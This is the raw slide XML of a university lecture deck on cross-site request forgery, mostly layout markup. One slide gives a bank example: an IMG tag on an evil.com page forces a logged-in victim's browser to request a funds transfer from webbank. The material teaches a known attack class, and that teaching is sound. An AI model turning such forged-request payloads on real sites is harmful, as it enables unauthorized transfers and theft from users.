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3.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image10.gif" ContentType="image/gif"/>
  <Override PartName="/ppt/media/image9.wmf" ContentType="image/x-wmf"/>
  <Override PartName="/ppt/media/image8.wmf" ContentType="image/x-wmf"/>
  <Override PartName="/ppt/media/image7.wmf" ContentType="image/x-wmf"/>
  <Override PartName="/ppt/media/image2.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image1.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image6.wmf" ContentType="image/x-wmf"/>
  <Override PartName="/ppt/media/image11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3004800" cy="97536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80816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4624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4624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80816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7008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70080" y="254160"/>
            <a:ext cx="104644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80816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4624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34624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80816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27008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270080" y="254160"/>
            <a:ext cx="104644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80816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4624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834624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80816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127008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270080" y="254160"/>
            <a:ext cx="104644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80816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834624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834624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body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480816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body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="127008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1270080" y="254160"/>
            <a:ext cx="104644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254160"/>
            <a:ext cx="104644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80816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834624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834624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480816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127008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1270080" y="254160"/>
            <a:ext cx="104644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80816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834624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834624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480816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127008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1270080" y="254160"/>
            <a:ext cx="10464480" cy="1130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5714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6322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1270080" y="575352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80816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346240" y="276876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834624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480816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1270080" y="5753520"/>
            <a:ext cx="336924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700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2280" y="2768760"/>
            <a:ext cx="510660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70080" y="5753520"/>
            <a:ext cx="10464480" cy="27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title style</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="8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50760" rIns="50760" tIns="50760" bIns="50760"/>
          <a:p>
            <a:pPr marL="343080" indent="-342720"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text styles</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="743040" indent="-285480" algn="ctr"/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Second level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" indent="-228240" algn="ctr"/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Third level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1600200" indent="-228240" algn="ctr"/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Fourth level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2057400" indent="-228240" algn="ctr"/>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3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Fifth level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="36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9334440"/>
            <a:ext cx="32763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Vijay Ganesh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title style</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="8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50760" rIns="50760" tIns="50760" bIns="50760" anchor="ctr"/>
          <a:p>
            <a:pPr marL="8380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text styles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1" marL="12826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Second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2" marL="17272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Third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3" marL="21718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Fourth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4" marL="261612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Fifth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12585600" y="9321840"/>
            <a:ext cx="342720" cy="367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fld id="{51017F7E-E00D-4025-8FBD-0DD4A468F777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9334440"/>
            <a:ext cx="32763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Vijay Ganesh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title style</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="8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12585600" y="9321840"/>
            <a:ext cx="342720" cy="367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fld id="{A3725A65-FD05-46E6-888B-B328D49AB02D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</a:rPr>
              <a:t>Click to edit the outline text format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</a:rPr>
              <a:t>Second Outline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</a:rPr>
              <a:t>Third Outline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</a:rPr>
              <a:t>Fourth Outline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>
            <a:off x="0" y="43344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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="86688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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="130032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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="173376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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="216720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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="260064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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="303444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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="346788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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="390132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0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="433476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1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="476820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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="520164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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="563508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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="606888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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="650232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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="693576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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="736920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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="780264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19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="823608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0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="866952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1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="910332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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="9536760"/>
            <a:ext cx="1300464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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="43344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24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="86688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25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="130032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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="173376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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="216720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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="260064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29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="303444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0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="346788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1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="390132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32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="433476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33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="476820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34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="520164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35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="563508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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="606888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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650232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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="693576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39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="736920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40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="780264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41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="823608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42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="866952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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="910332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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="953676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45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="997020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46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1040364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47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1083708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48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1127052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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1170432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50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1213776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51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12571200" y="0"/>
            <a:ext cx="360" cy="975348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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4768560" y="0"/>
            <a:ext cx="8236080" cy="216360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="openDmnd">
            <a:fgClr>
              <a:srgbClr val="cfdbfd"/>
            </a:fgClr>
            <a:bgClr>
              <a:srgbClr val="ffffff"/>
            </a:bgClr>
          </a:patt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53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12571200" y="0"/>
            <a:ext cx="360" cy="335952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54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="588960" y="2153880"/>
            <a:ext cx="253800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55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="865080" y="2018520"/>
            <a:ext cx="360" cy="330048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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="728640" y="2013840"/>
            <a:ext cx="273240" cy="275400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ah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57"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="866880" y="433440"/>
            <a:ext cx="11053800" cy="1408320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="129960" rIns="129960" tIns="65160" bIns="65160" anchor="b"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="5700" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="57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75" name="PlaceHolder 58"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="866880" y="2275920"/>
            <a:ext cx="11053800" cy="5851800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="129960" rIns="129960" tIns="65160" bIns="65160"/>
          <a:p>
            <a:pPr marL="487800" indent="-487440">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="799"/>
              </a:spcBef>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="40458c"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="40458c"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="1056600" indent="-406080">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="680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b="0" lang="en-US" sz="3400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="40458c"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>Second level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="40458c"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1625400" indent="-324720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="561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b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="40458c"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>Third level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="40458c"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3" marL="2275920" indent="-324720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="561"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="40458c"/>
              </a:buClr>
              <a:buSzPct val="6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40458c"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>Fourth level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="40458c"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4" marL="2926080" indent="-324720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="561"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="6f89f7"/>
              </a:buClr>
              <a:buSzPct val="60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40458c"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>Fifth level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="40458c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9334440"/>
            <a:ext cx="32763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Vijay Ganesh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title style</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="8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50760" rIns="50760" tIns="50760" bIns="50760" anchor="ctr"/>
          <a:p>
            <a:pPr marL="8380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text styles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1" marL="12826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Second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2" marL="17272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Third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3" marL="21718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Fourth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4" marL="261612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Fifth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sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12585600" y="9321840"/>
            <a:ext cx="342720" cy="367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fld id="{F9FC6205-E6FA-421E-A01C-0A7C100779A4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9334440"/>
            <a:ext cx="32763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Vijay Ganesh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to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edit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Maste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r title </a:t>
            </a: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style</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="8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50760" rIns="50760" tIns="50760" bIns="50760" anchor="ctr"/>
          <a:p>
            <a:pPr marL="8380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text styles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1" marL="12826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Second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2" marL="17272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Third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3" marL="21718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Fourth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4" marL="261612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Fifth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sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12585600" y="9321840"/>
            <a:ext cx="342720" cy="367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fld id="{CD65E5A6-8B28-4AE7-B580-B211EF77F8E0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0" y="9334440"/>
            <a:ext cx="32763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Vijay Ganesh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1270080" y="254160"/>
            <a:ext cx="10464480" cy="2437920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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8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title style</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="8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1270080" y="2768760"/>
            <a:ext cx="10464480" cy="5714640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="50760" rIns="50760" tIns="50760" bIns="50760" anchor="ctr"/>
          <a:p>
            <a:pPr marL="8380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Click to edit Master text styles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1" marL="12826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Second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2" marL="17272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Third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3" marL="217188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Fourth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  <a:p>
            <a:pPr lvl="4" marL="2616120" indent="-571320">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2401"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="171000"/>
              <a:buFont typeface="Gill Sans"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="42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Fifth level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="42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sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12585600" y="9321840"/>
            <a:ext cx="342720" cy="367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fld id="{95178A23-6432-424E-A8B9-A855DED09FB4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03040" y="1422360"/>
            <a:ext cx="12598200" cy="3720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en-US" sz="8400" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="a40800"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Gill Sans"/>
                <a:ea typeface="ヒラギノ角ゴ ProN W3"/>
              </a:rPr>
              <a:t>Cross-site Request Forgery (CSRF) Attacks</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="8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1219320" y="6451560"/>
            <a:ext cx="10566000" cy="21078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d99"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans"/>
                <a:ea typeface="ヒラギノ角ゴ ProN W3"/>
              </a:rPr>
              <a:t>Vijay Ganesh</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans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d99"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans"/>
                <a:ea typeface="ヒラギノ角ゴ ProN W3"/>
              </a:rPr>
              <a:t>University of Waterloo</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans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2d99"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans"/>
                <a:ea typeface="ヒラギノ角ゴ ProN W3"/>
              </a:rPr>
              <a:t>Winter 2013</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Gill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55A114AB-BB21-4822-BE3F-B9E302596876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-25560" y="0"/>
            <a:ext cx="13029840" cy="1420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CSRF Attack: Bank Example*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525600" y="5020920"/>
            <a:ext cx="1195308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Attacker website has an image with the above tag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The image forces the user’s browser a “forged request” with the specified URL, and if the customer is logged into the bank, money will be transferred from 314159265 to “1618”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The forged request is a GET request with body similar to the POST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7870680" y="9053280"/>
            <a:ext cx="4608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Example courtesy https://www.whitehatsec.com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309600" y="1492560"/>
            <a:ext cx="12457080" cy="30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26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10186920" y="8886600"/>
            <a:ext cx="2709000" cy="6498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lIns="129960" rIns="129960" tIns="65160" bIns="65160" anchor="ctr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b7c1eb"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>slide </a:t>
            </a:r>
            <a:fld id="{EC3C5CC1-6B9D-4778-BCB6-8BD606AA804F}" type="slidenum">
              <a:rPr b="0" lang="en-US" sz="1700" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="b7c1eb"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1700" spc="-1" strike="noStrike">
              <a:latin typeface="Times New Roman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0" y="0"/>
            <a:ext cx="13004280" cy="1059840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="131040" rIns="131040" tIns="65520" bIns="65520" anchor="b"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="5700" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>CSRF: Bank Example</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="57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5466960" y="2253240"/>
            <a:ext cx="147888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victim’s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browser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650160" y="3467880"/>
            <a:ext cx="1191600" cy="5395680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28440">
            <a:solidFill>
              <a:schemeClr val="bg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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="560160" y="2487960"/>
            <a:ext cx="15458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evil.com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9" name="CustomShape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5960520" y="3467880"/>
            <a:ext cx="866520" cy="5395680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28440">
            <a:solidFill>
              <a:schemeClr val="bg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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10837440" y="3382200"/>
            <a:ext cx="1191600" cy="5395680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28440">
            <a:solidFill>
              <a:schemeClr val="bg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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1842120" y="4334760"/>
            <a:ext cx="4118400" cy="32508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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2211120" y="4118040"/>
            <a:ext cx="3150000" cy="39528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ヒラギノ角ゴ ProN W3"/>
              </a:rPr>
              <a:t>Access some web page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3" name="Line 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1842120" y="4984920"/>
            <a:ext cx="4118400" cy="32508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1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2059200" y="4768560"/>
            <a:ext cx="3575880" cy="196344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&lt;IMG SRC=http://webbank/transfer_funds.cgi? from=314159265&amp;to=1618&amp;amount=5000&amp;date=11072006&amp;re=0&gt;unt=5000&amp;date=11072006&amp;re=0&gt;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&gt;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CustomShape 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2167560" y="6610680"/>
            <a:ext cx="3470400" cy="1217880"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 21287"/>
              <a:gd name="adj2" fmla="val -88194"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg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/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  <a:ea typeface="ヒラギノ角ゴ ProN W3"/>
              </a:rPr>
              <a:t>Forces victim’s browser to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  <a:ea typeface="ヒラギノ角ゴ ProN W3"/>
              </a:rPr>
              <a:t>call transfer.cgi on webbank.com without proper permissions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Line 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6827400" y="5201640"/>
            <a:ext cx="4009680" cy="32508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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7044120" y="4985280"/>
            <a:ext cx="3575880" cy="8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POST/transfer.cgi?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from= 314159265&amp;to=01123581&amp;amount=5000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8" name="CustomShape 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10887480" y="5420880"/>
            <a:ext cx="2123280" cy="84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>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="26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transfer.cgi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6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executed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29" name="Line 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6827400" y="6719040"/>
            <a:ext cx="4009680" cy="456120"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28440">
            <a:solidFill>
              <a:schemeClr val="bg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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7005960" y="6820920"/>
            <a:ext cx="3575880" cy="8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GET/transfer.cgi?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from= 314159265&amp;to=01123581&amp;amount=5000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1" name="CustomShape 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7407720" y="8019720"/>
            <a:ext cx="3103920" cy="1299960"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 20546"/>
              <a:gd name="adj2" fmla="val -78819"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg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  <a:ea typeface="ヒラギノ角ゴ ProN W3"/>
              </a:rPr>
